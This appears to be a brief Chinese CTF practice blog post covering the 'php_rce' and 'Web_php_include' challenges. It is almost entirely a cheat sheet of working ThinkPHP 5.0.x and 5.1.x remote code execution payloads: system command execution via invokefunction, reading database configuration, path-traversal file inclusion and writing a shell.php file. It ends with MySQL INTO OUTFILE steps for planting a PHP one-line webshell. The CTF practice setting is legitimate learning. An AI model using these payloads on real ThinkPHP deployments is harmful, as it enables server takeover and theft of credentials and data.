emmm,BUU 那个谷歌人机验证,好难我大概是个机器人,先做点攻防世界吧…
php_rce
payload:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
payload 来自:https://y4er.com/post/thinkphp5-rce/
5.0.x
1 2 3 4 5
| ?s=index/think\config/get&name=database.username // 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg // 包含任意文件 ?s=index/\think\Config/load&file=../../t.php // 包含任意.php文件 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami
|
5.1.x
1 2 3 4 5
| ?s=index/\think\Request/input&filter[]=system&data=pwd ?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?> ?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?> ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
|
Web_php_include
SHOW VARIABLES LIKE “secure_file_priv” 如果是 null 不能写
SELECT “php 一句话” INTO OUTFILE ‘路径’
然后文件包含
最后更新时间: